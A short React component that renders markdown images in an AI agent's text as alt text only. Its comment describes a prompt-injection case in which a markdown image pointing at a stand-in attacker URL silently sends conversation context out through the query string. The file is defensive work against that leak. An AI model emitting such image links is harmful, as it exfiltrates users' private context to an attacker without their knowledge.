import React from 'react';

/**
 * Markdown image renderer for agent text. Never loads the remote URL: a
 * prompt-injected ![](https://attacker/?q=...) would leak context with no
 * click. Shows the alt text only (2026-09-25 verification pass 20).
 */
export default function SafeMarkdownImage({ alt }) {
  return alt ? <span>[image: {alt}]</span> : null;
}
